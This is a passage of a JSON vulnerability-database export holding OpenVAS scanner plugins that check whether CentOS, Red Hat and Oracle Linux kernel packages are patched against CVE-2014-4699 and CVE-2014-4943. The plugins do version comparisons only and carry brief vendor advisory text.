"AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:12:28", "references": ["http://lists.centos.org/pipermail/centos-announce/2014-July/020444.html", "2014:0924"], "pluginID": "1361412562310881965", "description": "Check for the Version of kernel", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-07-28T00:00:00", "title": "CentOS Update for kernel CESA-2014:0924 centos6 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881965", "id": "OPENVAS:1361412562310881965", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2014:0924 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881965\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:29:10 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-4699\", \"CVE-2014-4943\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for kernel CESA-2014:0924 centos6 \");\n\n tag_insight = \"The kernel packages contain the Linux kernel, the core of any\nLinux operating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced\nprocess' instruction pointer to be set to a non-canonical memory address\nwithout forcing the non-sysret code path when returning to user space.\nA local, unprivileged user could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-4699,\nImportant)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699,\nand Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n\";\n\n tag_affected = \"kernel on CentOS 6\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"CESA\", value: \"2014:0924\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2014-July/020444.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~431.20.5.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~431.20.5.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~431.20.5.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~431.20.5.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~431.20.5.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~431.20.5.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~431.20.5.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~431.20.5.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~431.20.5.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~2.6.32~431.20.5.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:12:17", "references": ["https://www.redhat.com/archives/rhsa-announce/2014-July/msg00050.html", "2014:0924-01"], "pluginID": "1361412562310871206", "description": "Check for the Version of kernel", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-07-28T00:00:00", "title": "RedHat Update for kernel RHSA-2014:0924-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871206", "id": "OPENVAS:1361412562310871206", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2014:0924-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871206\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:42:37 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-4699\", \"CVE-2014-4943\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for kernel RHSA-2014:0924-01\");\n\n tag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced\nprocess' instruction pointer to be set to a non-canonical memory address\nwithout forcing the non-sysret code path when returning to user space.\nA local, unprivileged user could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-4699,\nImportant)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699,\nand Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n\";\n\n tag_affected = \"kernel on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2014:0924-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2014-July/msg00050.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~431.20.5.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:53:15", "references": ["http://linux.oracle.com/errata/ELSA-2014-3048.html"], "pluginID": "1361412562310123378", "description": "Oracle Linux Local Security Checks ELSA-2014-3048", "edition": 2, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Oracle Linux Local Check: ELSA-2014-3048", "type": "openvas", "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2017-07-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123378", "id": "OPENVAS:1361412562310123378", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2014-3048.nasl 6559 2017-07-06 11:57:32Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.123378\");\nscript_version(\"$Revision: 6559 $\");\nscript_tag(name:\"creation_date\", value:\"2015-10-06 14:03:00 +0300 (Tue, 06 Oct 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 13:57:32 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2014-3048\");\nscript_tag(name: \"insight\", value: \"ELSA-2014-3048 - unbreakable enterprise kernel security update - kernel-uek[2.6.32-400.36.4uek]- l2tp: fix an unprivileged user to kernel privilege escalation (Sasha Levin) [Orabug: 19229529] {CVE-2014-4943} {CVE-2014-4943}- ptrace,x86: force IRET path after a ptrace_stop() (Tejun Heo) [Orabug: 19230692] {CVE-2014-4699}\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2014-3048\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2014-3048.html\");\nscript_cve_id(\"CVE-2014-4943\",\"CVE-2014-4699\");\nscript_tag(name:\"cvss_base\", value:\"6.9\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.32~400.36.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.32~400.36.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.32~400.36.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.32~400.36.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.32~400.36.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.32~400.36.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-headers\", rpm:\"kernel-uek-headers~2.6.32~400.36.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.4.el5uek~1.5.7~2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.4.el5uekdebug~1.5.7~2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.4.el5uek~1.5.1~4.0.58\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.4.el5uekdebug~1.5.1~4.0.58\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.32~400.36.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.32~400.36.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.32~400.36.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.32~400.36.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.32~400.36.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.32~400.36.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-headers\", rpm:\"kernel-uek-headers~2.6.32~400.36.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.4.el6uek~1.5.7~0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.4.el6uekdebug~1.5.7~0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.4.el6uek~1.5.1~4.0.58\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.4.el6uekdebug~1.5.1~4.0.58\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:53:01", "references": ["http://linux.oracle.com/errata/ELSA-2014-0924.html"], "pluginID": "1361412562310123363", "description": "Oracle Linux Local Security Checks ELSA-2014-0924", "edition": 2, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "title": "Oracle Linux Local Check: ELSA-2014-0924", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2017-07-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123363", "id": "OPENVAS:1361412562310123363", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2014-0924.nasl 6559 2017-07-06 11:57:32Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.123363\");\nscript_version(\"$Revision: 6559 $\");\nscript_tag(name:\"creation_date\", value:\"2015-10-06 14:02:47 +0300 (Tue, 06 Oct 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 13:57:32 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2014-0924\");\nscript_tag(name: \"insight\", value: \"ELSA-2014-0924 - kernel security update - [2.6.32-431.20.5]- [netdrv] pppol2tp: fail when socket option level is not SOL_PPPOL2TP [1119461 1119462] {CVE-2014-4943}[2.6.32-431.20.4]- [kernel] utrace: force IRET path after utrace_finish_vfork() (Oleg Nesterov) [1115932 1115933] {CVE-2014-4699}\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2014-0924\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2014-0924.html\");\nscript_cve_id(\"CVE-2014-4943\",\"CVE-2014-4699\");\nscript_tag(name:\"cvss_base\", value:\"6.9\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~431.20.5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~431.20.5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~431.20.5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~431.20.5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~431.20.5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~431.20.5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~431.20.5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~431.20.5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~431.20.5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~2.6.32~431.20.5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:53:22", "references": ["http://linux.oracle.com/errata/ELSA-2014-0923.html"], "pluginID": "1361412562310123356", "description": "Oracle Linux Local Security Checks ELSA-2014-0923", "edition": 2, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "title": "Oracle Linux Local Check: ELSA-2014-0923", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2017-07-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123356", "id": "OPENVAS:1361412562310123356", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2014-0923.nasl 6559 2017-07-06 11:57:32Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n 